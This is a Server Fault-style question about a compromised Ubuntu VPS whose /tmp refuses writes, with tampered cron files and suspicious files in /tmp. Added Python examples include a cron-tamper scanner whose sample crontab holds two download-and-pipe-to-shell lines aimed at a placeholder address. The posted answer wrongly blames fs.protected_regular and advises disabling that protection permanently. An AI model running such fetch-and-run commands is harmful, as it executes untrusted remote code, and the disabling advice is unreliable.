Why can't even my root user write in the /tmp directory?

I cannot write in the /tmp directory.

This as a non-root user:

europasprak@vps-xxxxxxxx:~$ echo 'ok' > /tmp/dummy
-bash: /tmp/dummy: Operation not permitted

and

europasprak@vps-xxxxxxxx:~$ sudo echo 'ok' | sudo tee /tmp/dummy
tee: /tmp/dummy: Operation not permitted

As well as a root user:

root@vps-xxxxxxxx:~# echo 'ok' > /tmp/dummy
bash: /tmp/dummy: Operation not permitted

It even refuses before(!) asking for the sudo password:

Last login: Wed Aug 18 19:38:33 2021 from 91.168.98.130
europasprak@vps-3506b083:~$ sudo echo 'ok' > /tmp/dummy2
-bash: /tmp/dummy2: Operation not permitted

Interestingly, it refuses to set the times, as root, in this command:

root@vps-xxxxxxxx:/home/europasprak# touch /tmp/ok
touch: setting times of '/tmp/ok': No such file or directory

The issue showed up this morning.

The machine is:

europasprak@vps-xxxxxxxx:~$ uname -a
Linux vps-xxxxxxxx 5.8.0-63-generic #71-Ubuntu SMP Tue Jul 13 15:59:12 UTC 2021 x86_64 x86_64 x86_64 GNU/Linux

The partitions:

europasprak@vps-xxxxxxxx:~$ df
Filesystem     1K-blocks     Used Available Use% Mounted on
tmpfs             795424     1072    794352   1% /run
/dev/sda1      162420480 59362024 103042072  37% /
tmpfs            3977116        0   3977116   0% /dev/shm
tmpfs               5120        0      5120   0% /run/lock
tmpfs               4096        0      4096   0% /sys/fs/cgroup
/dev/sda15        106858     8008     98851   8% /boot/efi
overlay        162420480 59362024 103042072  37% /home/europasprak/programs/install/docker/overlay2/2f1f82255bbd13b61ea151363e46880c4902b4b822fca15078fb9a10461111df/merged

europasprak@vps-xxxxxxxx:~$ df -i
Filesystem       Inodes  IUsed    IFree IUse% Mounted on
tmpfs            994279    640   993639    1% /run
/dev/sda1      20643840 523620 20120220    3% /
tmpfs            994279      4   994275    1% /dev/shm
tmpfs            994279      3   994276    1% /run/lock
tmpfs              1024     18     1006    2% /sys/fs/cgroup
/dev/sda15            0      0        0     - /boot/efi

Some more output:

europasprak@vps-xxxxxxxx:~$ ls -ld /tmp
drwxrwxrwt 12 root root 4096 août  18 05:45 /tmp

europasprak@vps-xxxxxxxx:~$ lsattr /tmp
--------------e----- /tmp/dump.rdb
lsattr: Permission denied While reading flags on /tmp/systemd-private-b0ce13ad416741f3ba842d3821949044-systemd-timesyncd.service-11J2sh
lsattr: Permission denied While reading flags on /tmp/tmp.40xGrsPHCk
--------------e----- /tmp/exp_lin.so
--------------e----- /tmp/oi_plugins.php
--------------e----- /tmp/backup.db
lsattr: Permission denied While reading flags on /tmp/systemd-private-b0ce13ad416741f3ba842d3821949044-systemd-logind.service-ffm01g
lsattr: Permission denied While reading flags on /tmp/systemd-private-b0ce13ad416741f3ba842d3821949044-systemd-resolved.service-E7ECGg
--------------e----- /tmp/xm4.tgz
lsattr: Permission denied While reading flags on /tmp/snap.lxd

UPDATE: I tried installing acl but, obviously, it failed:

europasprak@vps-xxxxxxxx:~$ sudo apt install acl
Reading package lists... Error!
E: Unable to mkstemp /tmp/clearsigned.message.VjQNL9 - GetTempFile (1: Operation not permitted)
E: The package lists or status file could not be parsed or opened.
europasprak@vps-xxxxxxxx:~$ sudo apt update
Err:1 http://security.ubuntu.com/ubuntu groovy-security InRelease
  Temporary failure resolving 'security.ubuntu.com'
Err:2 https://download.docker.com/linux/ubuntu groovy InRelease
  Temporary failure resolving 'download.docker.com'
Err:3 http://ppa.launchpad.net/ultradvorka/ppa/ubuntu groovy InRelease
  Temporary failure resolving 'ppa.launchpad.net'
Err:4 http://nova.clouds.archive.ubuntu.com/ubuntu groovy InRelease
  Temporary failure resolving 'nova.clouds.archive.ubuntu.com'
Err:5 http://nova.clouds.archive.ubuntu.com/ubuntu groovy-updates InRelease
  Temporary failure resolving 'nova.clouds.archive.ubuntu.com'
Err:6 http://nova.clouds.archive.ubuntu.com/ubuntu groovy-backports InRelease
  Temporary failure resolving 'nova.clouds.archive.ubuntu.com'
Reading package lists... Error!
W: Failed to fetch http://nova.clouds.archive.ubuntu.com/ubuntu/dists/groovy/InRelease  Temporary failure resolving 'nova.clouds.archive.ubuntu.com'
W: Failed to fetch http://nova.clouds.archive.ubuntu.com/ubuntu/dists/groovy-updates/InRelease  Temporary failure resolving 'nova.clouds.archive.ubuntu.com'
W: Failed to fetch http://nova.clouds.archive.ubuntu.com/ubuntu/dists/groovy-backports/InRelease  Temporary failure resolving 'nova.clouds.archive.ubuntu.com'
W: Failed to fetch http://security.ubuntu.com/ubuntu/dists/groovy-security/InRelease  Temporary failure resolving 'security.ubuntu.com'
W: Failed to fetch https://download.docker.com/linux/ubuntu/dists/groovy/InRelease  Temporary failure resolving 'download.docker.com'
W: Failed to fetch http://ppa.launchpad.net/ultradvorka/ppa/ubuntu/dists/groovy/InRelease  Temporary failure resolving 'ppa.launchpad.net'
W: Some index files failed to download. They have been ignored, or old ones used instead.
E: Unable to mkstemp /tmp/clearsigned.message.cOHaS4 - GetTempFile (1: Operation not permitted)
E: The package lists or status file could not be parsed or opened.

UPDATE: I had also tried to switch off a setting but that did not help:

europasprak@vps-xxxxxxxx:~$ sudo echo 'ok' > /tmp/dummy
-bash: /tmp/dummy: Operation not permitted
europasprak@vps-xxxxxxxx:~$ sudo sysctl fs.protected_regular=0  
[sudo] password for europasprak: 
fs.protected_regular = 0
europasprak@vps-xxxxxxxx:~$ sudo echo 'ok' > /tmp/dummy
-bash: /tmp/dummy: Operation not permitted

The VPS is a kvm instance:

europasprak@vps-xxxxxxxx:~$ sudo virt-what
kvm

UPDATE:

europasprak@vps-xxxxxxxx:~$ sudo journalctl --boot --priority=4
[sudo] password for europasprak: 
-- Logs begin at Thu 2021-04-01 18:46:32 UTC, end at Sun 2021-08-22 13:54:48 UTC. --
août 20 20:52:46 vps-3506b083 kernel:  #2
août 20 20:52:46 vps-3506b083 kernel:  #3
août 20 20:52:46 vps-3506b083 kernel: acpi PNP0A03:00: fail to add MMCONFIG information, can't access extended PCI configuration space under this bridge.
août 20 20:52:46 vps-3506b083 kernel: platform eisa.0: EISA: Cannot allocate resource for mainboard
août 20 20:52:46 vps-3506b083 kernel: platform eisa.0: Cannot allocate resource for EISA slot 1
août 20 20:52:46 vps-3506b083 kernel: platform eisa.0: Cannot allocate resource for EISA slot 2
août 20 20:52:46 vps-3506b083 kernel: platform eisa.0: Cannot allocate resource for EISA slot 3
août 20 20:52:46 vps-3506b083 kernel: platform eisa.0: Cannot allocate resource for EISA slot 4
août 20 20:52:46 vps-3506b083 kernel: platform eisa.0: Cannot allocate resource for EISA slot 5
août 20 20:52:46 vps-3506b083 kernel: platform eisa.0: Cannot allocate resource for EISA slot 6
août 20 20:52:46 vps-3506b083 kernel: platform eisa.0: Cannot allocate resource for EISA slot 7
août 20 20:52:46 vps-3506b083 kernel: platform eisa.0: Cannot allocate resource for EISA slot 8
août 20 20:52:46 vps-3506b083 kernel: sd 2:0:0:0: Power-on or device reset occurred
août 20 20:52:46 vps-3506b083 systemd[1]: /lib/systemd/system/plymouth-start.service:17: Unit configured to use KillMode=none. This is unsafe, as it disables>
août 20 20:52:46 vps-3506b083 systemd[1]: /lib/systemd/system/dbus.service:12: Unit configured to use KillMode=none. This is unsafe, as it disables systemd's>
août 20 20:52:46 vps-3506b083 systemd-udevd[413]: Could not set WakeOnLan of ens3 to off: Operation not supported
août 20 20:52:48 vps-3506b083 systemd-networkd[658]: /run/systemd/network/10-netplan-ens3.network: MTUBytes= in [Link] section and UseMTU= in [DHCP] section >
août 20 20:52:50 vps-3506b083 cron[702]: Error: bad minute; while reading /etc/crontab
août 20 20:52:50 vps-3506b083 cron[702]: Error: bad minute; while reading /etc/cron.d/zzh
août 20 20:52:50 vps-3506b083 cron[702]: Error: bad minute; while reading /etc/cron.d/dog
août 20 20:52:51 vps-3506b083 systemd-networkd[658]: rtnl: received neighbor for link '3' we don't know about, ignoring.
août 20 20:52:51 vps-3506b083 systemd-networkd[658]: rtnl: received neighbor for link '3' we don't know about, ignoring.
août 20 20:52:51 vps-3506b083 systemd-networkd[658]: rtnl: received neighbor for link '3' we don't know about, ignoring.
août 20 20:52:51 vps-3506b083 systemd-networkd[658]: rtnl: received neighbor for link '3' we don't know about, ignoring.
août 20 20:52:51 vps-3506b083 systemd-networkd[658]: rtnl: received neighbor for link '4' we don't know about, ignoring.
août 20 20:52:51 vps-3506b083 systemd-networkd[658]: rtnl: received neighbor for link '4' we don't know about, ignoring.
août 20 20:52:51 vps-3506b083 systemd-networkd[658]: rtnl: received neighbor for link '4' we don't know about, ignoring.
août 20 20:52:51 vps-3506b083 systemd-networkd[658]: rtnl: received neighbor for link '4' we don't know about, ignoring.
août 20 20:52:53 vps-3506b083 systemd-udevd[417]: testvxlan: Failed to get link config: No such device
août 20 20:52:53 vps-3506b083 systemd-udevd[417]: vx-001000-z6tjy: Failed to get link config: No such device
août 20 20:52:53 vps-3506b083 systemd-udevd[413]: vethe97279b: Could not generate persistent MAC: No data available
août 20 20:52:53 vps-3506b083 systemd-udevd[417]: vethe514997: Could not generate persistent MAC: No data available
août 20 20:52:53 vps-3506b083 systemd-networkd[658]: vethe97279b: Failed to wait for the interface to be initialized: No such device
europasprak@vps-3506b083:~$ 

UPDATE: I can see my /etc/crontab file has been tampered with. My system has been hacked. Strangely enough there doesn't seem to be any mining activity going on. I reckon I need to do a full re-install of the system.

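The cron errors in the journal above ("bad minute" while reading /etc/crontab and two files in /etc/cron.d) are exactly what a small integrity check over cron files can surface. The following is an added example, not code from the original thread or the OP's system: it scans crontab-format text for schedules cron would reject, control characters embedded in an entry, and commands that pipe a remote download straight into a shell. The sample crontab and the 198.51.100.7 address are constructed.

```python
"""Added example (not from the thread): flag cron entries that look tampered with."""
from __future__ import annotations
import re
from dataclasses import dataclass

# One Vixie-cron schedule field: "*" or number, optional -range and /step, comma lists.
_FIELD = re.compile(r"^(\*|\d+)(-\d+)?(/\d+)?(,(\*|\d+)(-\d+)?(/\d+)?)*$")
_SPECIAL = {"@reboot", "@yearly", "@annually", "@monthly", "@weekly", "@daily", "@hourly"}
# A downloader whose output is piped straight into a shell interpreter.
_PIPE_TO_SHELL = re.compile(r"\b(curl|wget)\b[^|]*\|\s*(ba|da)?sh\b")
# Control bytes other than tab and newline never belong in a crontab entry.
_CONTROL = re.compile(r"[\x00-\x08\x0b-\x1f\x7f]")

@dataclass
class Finding:
    lineno: int
    reason: str
    line: str

def scan_crontab(text: str) -> list[Finding]:
    """Works for /etc/crontab, /etc/cron.d/* and user crontabs alike: only the
    five schedule fields are parsed; the rest of the line is pattern-matched."""
    findings: list[Finding] = []
    for lineno, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        if not line or line[0] == "#" or re.match(r"[A-Za-z_]\w*=", line):
            continue  # blank line, comment or environment assignment
        if _CONTROL.search(line):
            findings.append(Finding(lineno, "control characters in entry", raw))
        if line[0] == "@":  # @reboot-style shorthand instead of five fields
            if line.split(None, 1)[0] not in _SPECIAL:
                findings.append(Finding(lineno, "bad schedule", raw))
        else:
            fields = line.split(None, 5)[:5]
            if len(fields) < 5 or not all(_FIELD.match(f) for f in fields):
                findings.append(Finding(lineno, "bad schedule", raw))  # cron: "bad minute"
        if _PIPE_TO_SHELL.search(line):
            findings.append(Finding(lineno, "remote download piped into shell", raw))
    return findings

# Constructed sample in /etc/crontab layout; 198.51.100.7 is a documentation address.
SAMPLE_CRONTAB = (
    "# constructed sample, not the file from the question\n"
    "SHELL=/bin/sh\n"
    "17 *\t* * *\troot    cd / && run-parts --report /etc/cron.hourly\n"
    "*/2 * * * * root curl -fsSL http://198.51.100.7/b.sh | sh\n"
    "*/5 * \x01\x02root wget -q -O- http://198.51.100.7/b.sh | sh\n"
    "@daily root /usr/local/bin/backup\n"
)
```

Running `scan_crontab(SAMPLE_CRONTAB)` reports one finding for the curl line and three for the line with embedded control bytes, which is also the one cron itself would refuse with "bad minute".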
Comments on the question:

Comment: Is there something called `/tmp/dummy` that is write protected? Opening a file for writing does not reset the permission bits even if you have the right to do so.

Comment (Stephane): No, there is no such file. It's not a sticky bit issue. It occurs even for new, non-existing files.

Comment: Check `lsattr`, `getfacl`.

Comment (Michael Hampton): Check the syslog and `dmesg` for any clues.

Comment (Stephane): @AlexD I could not install acl.

Comment: Could you add the output of `journalctl --boot --priority=4`?
Answer:

This is standard behaviour in Ubuntu 20.04+ due to the new fs.protected_regular Linux kernel parameter. You can try disabling it like this:

sudo sysctl fs.protected_regular=0

and see if you can write to /tmp now.

If you want to make the fs.protected_regular=0 change permanent, add it to the /usr/lib/sysctl.d/protect-links.conf file.
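What fs.protected_regular actually gates, as an added model that is not part of the answer above or the kernel's own code: the kernel's may_create_in_sticky() check in fs/namei.c only applies to an O_CREAT open that lands on an existing regular file in a sticky directory owned by neither the caller nor the directory owner, and a denial is EACCES ("Permission denied"), not EPERM. The uids and the /tmp mode below are constructed from the `ls -ld /tmp` output in the question.

```python
"""Added model of the kernel's may_create_in_sticky() check (fs/namei.c), the code
that fs.protected_regular switches on. Not the answer's or the kernel's own code."""
from __future__ import annotations
import errno
import stat

# Constructed values: /tmp as shown in the question (drwxrwxrwt, owned by root)
# and two arbitrary uids.
TMP_MODE = stat.S_IFDIR | stat.S_ISVTX | 0o777
ROOT, USER, OTHER = 0, 1000, 999

def may_create_in_sticky(protected_regular: int, dir_mode: int, dir_uid: int,
                         file_uid: int, caller_fsuid: int) -> int:
    """Mirror of the kernel check for a regular file that already exists in the
    directory. Returns 0 (allowed) or errno.EACCES; it never yields EPERM."""
    if protected_regular == 0:
        return 0                      # knob off: classic Unix semantics
    if not dir_mode & stat.S_ISVTX:
        return 0                      # directory is not sticky
    if file_uid == dir_uid or caller_fsuid == file_uid:
        return 0                      # file belongs to the dir owner or the caller
    if dir_mode & 0o002:
        return errno.EACCES           # world-writable sticky dir: denied from level 1
    if dir_mode & 0o020 and protected_regular >= 2:
        return errno.EACCES           # group-writable sticky dir: denied at level 2
    return 0

def open_with_o_creat(protected_regular: int, dir_mode: int, dir_uid: int,
                      existing_file_uid: int | None, caller_fsuid: int) -> int:
    """O_CREAT open of a path in the directory. existing_file_uid=None means the
    file does not exist yet: the kernel creates it owned by the caller, so the
    check passes trivially. The knob only bites on an existing file."""
    file_uid = caller_fsuid if existing_file_uid is None else existing_file_uid
    return may_create_in_sticky(protected_regular, dir_mode, dir_uid, file_uid, caller_fsuid)

def demo() -> dict[str, int]:
    """The cases from the thread plus the one the knob exists for."""
    return {
        # root creating a brand-new /tmp/dummy is allowed at every level, so the
        # question's EPERM on a new file cannot come from this sysctl
        "root_new_file_level2": open_with_o_creat(2, TMP_MODE, ROOT, None, ROOT),
        # root rewriting a file another user left in /tmp: this is what the knob
        # blocks (the classic /tmp file-squatting defence), and it applies to root
        "root_overwrite_other_level1": open_with_o_creat(1, TMP_MODE, ROOT, OTHER, ROOT),
        # the same open with the knob switched off, as the answer suggests
        "root_overwrite_other_level0": open_with_o_creat(0, TMP_MODE, ROOT, OTHER, ROOT),
        # a user rewriting their own file is never affected
        "user_own_file_level2": open_with_o_creat(2, TMP_MODE, ROOT, USER, USER),
    }
```

FIFOs follow the same rule under the sibling knob fs.protected_fifos, which this model leaves out.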

Comments on the answer:

Comment (Stephane): I had tried that before but it did not solve the issue. But welcome to SO :-)

Comment (Alex): Are you running a full virtualization or a container?

Comment (Stephane): The `sudo virt-what` command displayed `kvm`.